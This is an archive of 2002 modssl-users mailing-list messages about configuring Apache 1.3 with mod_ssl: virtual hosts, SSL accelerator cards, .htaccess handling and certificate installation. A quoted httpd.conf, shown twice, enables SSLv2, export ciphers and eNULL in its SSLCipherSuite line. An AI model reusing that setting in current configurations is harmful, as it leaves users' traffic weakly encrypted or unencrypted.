1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Denis Wang X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sorry to bother all. This email is to answer the question I raised. Previously I mixed a directive NameVirtualHost in my httpd.conf. SSL does not work with name-based virtual host. Best, Denis --- Denis Wang wrote: > Hello, > I am trying to config Apache1.3 to host IP-based virtual hosts in a single daemon with SSL > enabled. However, the server always looks for the global DocumentRoot instead of the > virtualhost > one. Any input will be highly appreciated!!!!!! > Details are included below. > Best regards, > Denis > > > 1. the whole website accessed from http at port 80 works fine > > 2. .jsp files accessed from https at port 443 work fine > > 3. .html files acccessed from https at port 443 work fine if in global DocumentRoot > > 4. .html files acccessed from https at port 443 NOT work if in virtualhost DocumentRoot > > > ***************************** > > my httpd.conf > > ***************************** > > > > DocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis > > ServerName www.mysite.com > > VirtualDocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis > > > > > > > > > > SSLEngine on > > SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > > SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt > > SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key > > > > DocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis > > ServerName www.mysite.com > > > > ErrorLog logs/surfer2sky_error_log > > TransferLog logs/surfer2sky_access_log > > SetEnvIf User-Agent ".*MSIE.*" \ > > nokeepalive ssl-unclean-shutdown \ > > downgrade-1.0 force-response-1.0 > > CustomLog logs/ssl_request_log \ > > "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" > > VirtualDocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis > > > > > > > > > > __________________________________________________ > > Do You Yahoo!? > > Try FREE Yahoo! Mail - the world's greatest free email! > > http://mail.yahoo.com/ > > > > > __________________________________________________ > Do You Yahoo!? > Try FREE Yahoo! Mail - the world's greatest free email! > http://mail.yahoo.com/ > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org __________________________________________________ Do You Yahoo!? Try FREE Yahoo! Mail - the world's greatest free email! http://mail.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 18:14:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA13200; Fri, 8 Mar 2002 18:13:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.webdms.com id SAA13185; Fri, 8 Mar 2002 18:12:58 +0100 (MET) Received: from jdp2 (firewall.webdms.com [199.184.207.3]) by www.webdms.com (8.8.5/SCO5) with SMTP id KAA11666 for ; Fri, 8 Mar 2002 10:19:24 -0700 (MST) Message-ID: <006001c1c6c5$ebe07fa0$0fa8a8c0@jdp2.webdms.com> From: "Joe Pearson" To: Subject: Re: quesion in DocumentRoot: Linux+Apache1.3 IP-based virtual host+mod_ssl+Tomcat Date: Fri, 8 Mar 2002 10:23:10 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Pearson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I had some strange problems when I did not have a listen directive in the conf file. Listen 11.222.333.44:443 HTH -- Joe Pearson Database Management Services, Inc. 208-384-1311 ext. 11 http://www.webdms.com -----Original Message----- From: Denis Wang To: modssl-users@modssl.org Date: Friday, March 08, 2002 10:06 AM Subject: quesion in DocumentRoot: Linux+Apache1.3 IP-based virtual host+mod_ssl+Tomcat >Hello, >I am trying to config Apache1.3 to host IP-based virtual hosts in a single daemon with SSL >enabled. However, the server always looks for the global DocumentRoot instead of the virtualhost >one. Any input will be highly appreciated!!!!!! >Details are included below. >Best regards, >Denis > >> 1. the whole website accessed from http at port 80 works fine >> 2. .jsp files accessed from https at port 443 work fine >> 3. .html files acccessed from https at port 443 work fine if in global DocumentRoot >> 4. .html files acccessed from https at port 443 NOT work if in virtualhost DocumentRoot > >> ***************************** >> my httpd.conf >> ***************************** >> >> DocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis >> ServerName www.mysite.com >> VirtualDocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis >> >> >> >> >> SSLEngine on >> SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL >> SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt >> SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key >> >> DocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis >> ServerName www.mysite.com >> >> ErrorLog logs/surfer2sky_error_log >> TransferLog logs/surfer2sky_access_log >> SetEnvIf User-Agent ".*MSIE.*" \ >> nokeepalive ssl-unclean-shutdown \ >> downgrade-1.0 force-response-1.0 >> CustomLog logs/ssl_request_log \ >> "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" >> VirtualDocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis >> >> >> >> >> __________________________________________________ >> Do You Yahoo!? >> Try FREE Yahoo! Mail - the world's greatest free email! >> http://mail.yahoo.com/ >> > > >__________________________________________________ >Do You Yahoo!? >Try FREE Yahoo! Mail - the world's greatest free email! >http://mail.yahoo.com/ >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 20:03:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA18941; Fri, 8 Mar 2002 20:02:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from irvexch1.rainbow.com id UAA18930; Fri, 8 Mar 2002 20:01:54 +0100 (MET) Message-ID: <5606C687D4C7D5119A5800508BF30DB401C041E9@mail.rainbow.com> From: lgazis To: "'modssl-users@modssl.org'" Subject: RE: SSL Hardware acceleration questions . . . Date: Fri, 8 Mar 2002 11:03:26 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: lgazis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm not sure how you tell, from the Apache end, whether Apache was built with the engine version of OpenSSL or not. I usually build with the engine version, for the purpose of testing with hardware accelerator cards, so I haven't checked that. It might be in the documentation, or someone else on the list may know. The hardware accelerator card (CryptoSwift) that I was testing is made by the company I work for, so I naturally have a vested interest in saying that it provides plenty of benefit :-). That said, I do have benchmark information on how Apache fared, under various sorts of load, on various systems, with and without the card, and also information on how I tweaked it to get the maximum benefit from the card. Contact me off the list if you want more details. Lynn Gazis Rainbow Technologies -----Original Message----- From: mike.innes@Oneaccount.com [mailto:mike.innes@Oneaccount.com] Sent: Friday, March 08, 2002 2:16 AM To: modssl-users@modssl.org Subject: RE: SSL Hardware acceleration questions . . . Lynn, Thanx for your reply - I don't know if Oracle iAS (which uses Apache/MOD_SSL/OpenSSL) uses the engine version, unfortunately as it is a packaged product recompilation is not possible, I'll bung a call into Oracle. How do I identify if the engine version is in use? (I'll have a look at the docs) How much benifit was the card? Mikey lgazis on 07/03/2002 21:48:29 Please respond to modssl-users@modssl.org To: "'modssl-users@modssl.org'" cc: Subject: RE: SSL Hardware acceleration questions . . . Fairly easy. For those hardware accelerators which are supported by the OpenSSL engine version, all you need to do is to compile modSSL with the engine version of OpenSSL (present as a separate version of OpenSSL from OpenSSL 0.9.6 on), and include a line in httpd.conf setting SSLCryptoDevice to the engine you wish to use. I've set this up on Solaris, HP UX, AIX, Linux, and FreeBSD. Lynn Gazis -----Original Message----- From: mike.innes@Oneaccount.com [mailto:mike.innes@Oneaccount.com] Sent: Thursday, March 07, 2002 9:37 AM To: modssl-users@modssl.org Subject: SSL Hardware acceleration questions . . . Dear all, Has anyone had any experience with hardware acceleration? specifically: How easy is it to get MOD_SSL to be configured with hardware SSL cards (any cards to avoid/recommend). We have Sun hardware (so Sun/Sonicwall ?) Does anything need to be recompiled? which versions of OpenSSL are supported etc. Any specific experiences with iAS would be excellent. What are the performance advantages? Anything tio watch out for? TIA Mikey All telephone calls are recorded and may be monitored. E-mail communication is not secure and may be intercepted by a third party. This message is confidential to the intended addressee. If you are not the intended addressee, please inform us immediately and then delete this message. Virgin One account does not accept responsibility for changes made to this message after it was sent. Although Virgin One account believes this e-mail is free of any virus or other defect which may affect a computer, it is the responsibility of the recipient to ensure that it is virus free and Virgin One account does not accept any responsibility for any loss or damage arising from its use. The Virgin One account is a secured personal bank account with The Royal Bank of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an Introducer representative only of Virgin Money Personal Financial Service Ltd, which is authorised by the Financial Services Authority for life insurance, pension and unit trust business and represents only the Virgin Money marketing group. Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK. Registered in England no 3414708. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 20:11:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA19863; Fri, 8 Mar 2002 20:10:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from abiri-e.com id UAA19816; Fri, 8 Mar 2002 20:09:54 +0100 (MET) Received: (qmail 1955 invoked from network); 8 Mar 2002 20:11:21 -0000 Received: from unknown (HELO AMIRCOMPUTER) (10.200.1.4) by 0 with SMTP; 8 Mar 2002 20:11:21 -0000 Message-ID: <000501c1c6d4$d3021520$0401c80a@AMIRCOMPUTER> From: "Amir Abiri" To: References: <5606C687D4C7D5119A5800508BF30DB401C041E9@mail.rainbow.com> Subject: Re: SSL Hardware acceleration questions . . . Date: Fri, 8 Mar 2002 21:09:51 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Amir Abiri" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users From: "lgazis" > I'm not sure how you tell, from the Apache end, whether Apache was built > with the engine version of OpenSSL or not. httpd -V ? -- "God is a programmer". ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 20:45:47 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA22066; Fri, 8 Mar 2002 20:44:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id UAA22037; Fri, 8 Mar 2002 20:43:40 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA06539 for ; Fri, 8 Mar 2002 14:48:53 -0500 Date: Fri, 8 Mar 2002 14:48:53 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: SSL Hardware acceleration questions . . . In-Reply-To: <000501c1c6d4$d3021520$0401c80a@AMIRCOMPUTER> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users If the tarball still exisits upon the server, the one would gain a clue via ls; openssl-engine-0.9.6b.tar.gz If the tarball was rm'ed but the sources exist, again a search would tell; /usr/local/src/installed/web/openssl-engine-0.9.6b/apps /usr/local/src/installed/web/openssl-engine-0.9.6b/apps/apps.c /usr/local/src/installed/web/openssl-engine-0.9.6b/apps/apps.h /usr/local/src/installed/web/openssl-engine-0.9.6b/apps/apps.o /usr/local/src/installed/web/openssl-engine-0.9.6b/apps/app_rand.c /usr/local/src/installed/web/openssl-engine-0.9.6b/apps/app_rand.o etc... else one might get a clue via the ssl install location perhaps looking at the include files I'm guessing here; /usr/local/ssl/include/openssl/engine.h I'm thinking if the engine version was not installed this header file might be lacking, folks without the engine version will have to confirm. of course, much of this stuff might well and should be missing from a running exposed system. but, I'm also guessing there are differences in the sizes of the binaries that are generated, suspecting the engine version to be somewhat larger. I'm not going to take the time here to build a non-engine version to verify, I'll leave that to someone else. Additionally this might well give a clue, the maintainers of the openssl code would beable to verify; strings openssl|grep engine Thanks, Ron DuFresne On Fri, 8 Mar 2002, Amir Abiri wrote: > > From: "lgazis" > > > > I'm not sure how you tell, from the Apache end, whether Apache was built > > with the engine version of OpenSSL or not. > > httpd -V ? > > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 9 01:04:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA11818; Sat, 9 Mar 2002 01:03:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from qm.aeroastro.com id BAA11789; Sat, 9 Mar 2002 01:03:04 +0100 (MET) Received: from mbarton.aeroastro.com (qm.aeroastro.com [127.0.0.1]) by qm.aeroastro.com (8.11.6/8.11.5) with ESMTP id g28Nqji01528 for ; Fri, 8 Mar 2002 18:52:45 -0500 Message-Id: <5.1.0.14.0.20020308185238.02872d08@localhost> X-Sender: mbarton@localhost X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 08 Mar 2002 19:03:20 -0500 To: modssl-users@modssl.org From: Mark Barton Subject: Page size not available Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-MailScanner: Found to be clean Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mark Barton X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have been running Apache_1.3.19-Mod_SSL_2.8.2-OpenSSL_0.9.6 on Windows NT and just now upgraded to Apache_1.3.23-Mod_SSL_2.8.7-OpenSSL_0.9.6c (both versions work very well and I am very appreciative to the contributor(s)). My problem - no, not problem, or even concern... minor bug is that on the new installation using 1.3.23 is that the page sizes are no longer available (the Page Size property of the served page is listed as 'Not Available') on Internet Explorer. I have not changed my httpd.conf file between the two installs. This is really no big deal, I was just wondering if someone knows why. Thanks in advance, Mark Barton ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 9 02:59:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA20036; Sat, 9 Mar 2002 02:58:39 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id CAA20008; Sat, 9 Mar 2002 02:58:03 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g291udi23515 for ; Fri, 8 Mar 2002 20:56:39 -0500 Date: Fri, 8 Mar 2002 20:56:39 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: Page size not available In-Reply-To: <5.1.0.14.0.20020308185238.02872d08@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, 8 Mar 2002, Mark Barton wrote: > My problem - no, not problem, or even concern... minor bug is that on the > new installation using 1.3.23 is that the page sizes are no longer > available (the Page Size property of the served page is listed as 'Not > Available') on Internet Explorer. I have not changed my httpd.conf file > between the two installs. This is really no big deal, I was just wondering > if someone knows why. FWIW, I did a diff between 1.3.19 and 1.3.23 from the CVS repository and didn't find anything right off in Apache itself that would have caused Content-Length to be unset when it didn't used to be, though of course something could have changed in mod_ssl that would do this, I suppose. Does this only happen under HTTPS or does it happen with regular HTTP as well? Can you give me a URL to try out so I can see what the response headers look like? Thanks, --Cliff -------------------------------------------------------------- Cliff Woolley Apache HTTP Server Project jwoolley@apache.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 9 04:23:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA29900; Sat, 9 Mar 2002 04:20:06 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp02.hutchcity.com id EAA29762; Sat, 9 Mar 2002 04:18:43 +0100 (MET) Received: (qmail 36329 invoked from network); 9 Mar 2002 03:12:25 -0000 Received: from unknown (HELO webmaill05) ([202.45.84.76]) (envelope-sender ) by localhost (qmail-ldap-1.03) with SMTP for ; 9 Mar 2002 03:12:25 -0000 Message-ID: <370449.1015643864739.JavaMail.root@webmaill05> Date: Sat, 9 Mar 2002 11:17:44 +0800 (HKT) From: Angus Lee To: modssl-users@modssl.org Subject: Re: .htaccess not processed with client authentication Mime-Version: 1.0 Content-Type: text/plain; charset=Big5 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Angus Lee X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, > ..htaccess (I missed the beginning of this question) - have you made sure > that AllowOverride allows the usage of .htaccess within those directories? Yes I do have something like this on my httpd.conf file: AllowOverride Options AuthConfig Limit Options Includes ExecCGI Will mod_ssl break when there're too many simutaneous accesses? Angus Lee ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 9 06:51:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA14823; Sat, 9 Mar 2002 06:50:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from blount.mail.mindspring.net id GAA14707; Sat, 9 Mar 2002 06:49:31 +0100 (MET) Received: from user-119a2lq.biz.mindspring.com ([66.149.10.186] helo=amadeus.basicsllp.com) by blount.mail.mindspring.net with esmtp (Exim 3.33 #1) id 16jZjK-00066i-00 for modssl-users@modssl.org; Sat, 09 Mar 2002 00:49:18 -0500 Received: from basicsllp.com (slip-210-88-169-24.fu.jp.prserv.net [210.88.169.24]) (authenticated) by amadeus.basicsllp.com (8.11.6/8.11.6) with ESMTP id g295nEJ08095 for ; Sat, 9 Mar 2002 00:49:15 -0500 Message-ID: <3C89A21F.3030707@basicsllp.com> Date: Sat, 09 Mar 2002 14:48:15 +0900 From: James Barwick User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.8) Gecko/20020204 X-Accept-Language: ja, en, en-us, zh MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: .htaccess not processed with client authentication References: <16610159.1015552002930.JavaMail.root@webmaill05> <20020308064654.GA19587@marvin-lnx.int.tele.dk> Content-Type: multipart/alternative; boundary="------------060908090604060204000205" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: James Barwick X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --------------060908090604060204000205 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Mads Toftum wrote: >On Fri, Mar 08, 2002 at 09:46:42AM +0800, Angus Lee wrote: > >>Hi, >> >>>Try to put all these directives in httpd.conf file and >>>also try to put the SSLRequire directive as follows >>> >>But I want each user to set their client authentication access control to their directory. >> >>Is there any bug with previous versions of mod_ssl which would make client authentication fails? >> >Not in any of the recent versions ... but since you seem to be wanting >.htaccess (I missed the beginning of this question) - have you made sure >that AllowOverride allows the usage of .htaccess within those directories? >http://httpd.apache.org/docs/mod/core.html#allowoverride > >vh > >Mads Toftum > I FOUND A BUG!!!!!!!!!!!!!! At least I think I did... If you have the following http://www.virtual1.com/directory/securedirectory http://www.virtual2.com/directory/securedirectory and on the file system virtual1.com DocumeentRoot is /usr/local/virtual1/directory/securedirectory and virtual2.com DocumentRoot is /usr/local/virtual2/directory/securedirectory --> /usr/local/virtual1/directory/securdierectory the .htaccess file in /usr/local/virtual1/directory/securedirectory will NOT be processed for virtual2.com. I tried this MANY MANY MANY times. Apache 1.3.22. The .htaccess file is not honored via a sym-link. Go figure... Don't dare tell me I'm wrong...this was my experience. If it works for you, great...this is just something to watch out for. I had to remove my Symlinks and copy directory contents to make virtual2.com work. I went up and down my httpd.conf file. BOTH virtual domains work correctly UNTIL I make a directory shared. There was a entry in my httpd.conf for with allow overrides options. I did NOT try /usr/local/shared/securedirectory /usr/local/virtual1/directory/securedirectory --> /usr/local/shared/securedirectory /usr/local/virtual2/directory/securedirectory --> /usr/local/shared/securedirectory I'd be interesting, however, to see what happens. My suspicion is that the .htaccess file won't be processed because of the symlink. I suspect you will also need a /usr/local/shared/securedirectory directory section with allow overrides...but really you shouldn't since the followsymlink options should honor the options of the "Parent" directory. IMHO. JDB -- ------------------------------------------------------------------------ James Barwick VP Technology ???????????? ????????????????? Sentient Health Japan, KK Aoyama Palacio Tower 11F 3-6-7 Kita-Aoyama Minatu-ku, Tokyo 107-0061 ???????????????????? ?107-0061 ???????3-6-7 ????????? 11? Tel: (03) 5778-7524 Fax: (03) 5778-7676 mailto:jbarwick@sentienthealth.com http://www.sentienthealth.com Tel: (03) 5778-7524 Fax: (03) 5778-7676 mailto:jbarwick@sentienthealth.com http://www.sentienthealth.com ------------------------------------------------------------------------ _ _ --------------060908090604060204000205 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Mads Toftum wrote:
On Fri, Mar 08, 2002 at 09:46:42AM +0800, Angus Lee wrote:
Hi,

Try to put all these directives in httpd.conf file and
also try to put the SSLRequire directive as follows
But I want each user to set their client authentication access control to their directory.

Is there any bug with previous versions of mod_ssl which would make client authentication fails?

Not in any of the recent versions ... but since you seem to be wanting
.htaccess (I missed the beginning of this question) - have you made sure
that AllowOverride allows the usage of .htaccess within those directories?
http://httpd.apache.org/docs/mod/core.html#allowoverride

vh

Mads Toftum
I FOUND A BUG!!!!!!!!!!!!!!   At least I think I did...

If you have the following

           http://www.virtual1.com/directory/securedirectory
           http://www.virtual2.com/directory/securedirectory

and on the file system virtual1.com DocumeentRoot is
         /usr/local/virtual1/directory/securedirectory
and virtual2.com DocumentRoot is
         /usr/local/virtual2/directory/securedirectory --> /usr/local/virtual1/directory/securdierectory

the .htaccess file in /usr/local/virtual1/directory/securedirectory will NOT be processed for virtual2.com.
 I tried this MANY MANY MANY times.  Apache 1.3.22. The .htaccess file is not honored via a sym-link.  Go figure...

Don't dare tell me I'm wrong...this was my experience.  If it works for you, great...this is just something to watch out for.
I had to remove my Symlinks and copy directory contents to make virtual2.com work.

I went up and down my httpd.conf file.  BOTH virtual domains work correctly UNTIL I make a directory shared.
There was a <directory> entry in my httpd.conf for
   <directory /usr/local/virtual1>
    </directory>
    <directory /user/local/virtual2>
    <directory>
with allow overrides options.

I did NOT try
         /usr/local/shared/securedirectory
         /usr/local/virtual1/directory/securedirectory --> /usr/local/shared/securedirectory
         /usr/local/virtual2/directory/securedirectory --> /usr/local/shared/securedirectory

I'd be interesting, however, to see what happens.  My suspicion is that the .htaccess file won't be processed because of the
symlink.

I suspect you will also need a /usr/local/shared/securedirectory directory section with allow overrides...but really you shouldn't
since the followsymlink options should honor the options of the "Parent" directory. IMHO.

JDB




--
Signature
James Barwick
VP Technology
 
 ジェームス・バーウィック
バイス・プレジデント・テクノロジー
Sentient Health Japan, KK
Aoyama Palacio Tower 11F
3-6-7 Kita-Aoyama
Minatu-ku, Tokyo 107-0061
 
 センティエント・ヘルス・ジャパン株式会社
〒107-0061 東京都港区青山3-6-7
青山パラシオタワー 11階
Tel: (03) 5778-7524
Fax: (03) 5778-7676
mailto:jbarwick@sentienthealth.com
http://www.sentienthealth.com
 Tel: (03) 5778-7524
Fax: (03) 5778-7676
mailto:jbarwick@sentienthealth.com
http://www.sentienthealth.com



--------------060908090604060204000205-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 9 09:33:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA29332; Sat, 9 Mar 2002 09:32:00 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA29199; Sat, 9 Mar 2002 09:30:37 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 0AD054CE718; Sat, 9 Mar 2002 09:30:36 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g298JYC30031; Sat, 9 Mar 2002 09:19:34 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-m01.mx.aol.com id DAA20785; Sat, 9 Mar 2002 03:07:04 +0100 (MET) Received: from miguelangelga@netscape.net by imo-m01.mx.aol.com (mail_out_v32.5.) id m.101.320d7da (16245) for ; Fri, 8 Mar 2002 21:06:27 -0500 (EST) Received: from netscape.com (mow-d02.webmail.aol.com [205.188.138.66]) by air-in03.mx.aol.com (v83.35) with ESMTP id MAILININ39-0308210626; Fri, 08 Mar 2002 21:06:26 -0500 Date: Fri, 08 Mar 2002 21:06:26 -0500 From: miguelangelga@netscape.net (Miguel Angel Gomez Animas) To: modssl-users@modssl.org Subject: Problems for install a Verisign Certificate Message-ID: <3744E9AB.13B289B9.B04B2822@netscape.net> X-Mailer: Atlas Mailer 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: miguelangelga@netscape.net (Miguel Angel Gomez Animas) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi..... I need help to install a certificate, by defaul when I installed Linux 7.0 Apache server is installed too. And i didn't have any troubles to able de SSL server, as you know, by default is installed a demo certificate. I need to change this certificate by a verisign certificate. Let me explain the process to create the csr requirement. 1.- In he directory /etc/httpd/conf/ssl.crt execute the follow command: openssl req -new -nodes -keyout private.key -out public.csr And Filled the fields with the necesary data ( State, City, Email...etc..) It generate a privated key named public.csr This file (public.csr) I used for request in Verisign, I requested a Trail ID,and thay email me back a key. 2.- The key that Verisign send me back I saved in the directory /etc/httpd/conf/ssl.crt with the name server.crt 3.- I restarted the apache webserver, but this error appear: Starting httpd: [FAILED] Can you tell me what is wrong.... maybe I lost some step.... I really apreciate your help....Thnaks a lot!!! Regards!!!! -- ________________________________________ Miguel Angel Gómez Animas mailto:miguelangelga@netscape.net URL: http://sites.netscape.net/miguelangelga/homepage __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 9 18:07:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA24489; Sat, 9 Mar 2002 18:06:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp02.hutchcity.com id SAA24149; Sat, 9 Mar 2002 18:05:50 +0100 (MET) Received: (qmail 59290 invoked from network); 9 Mar 2002 16:59:30 -0000 Received: from 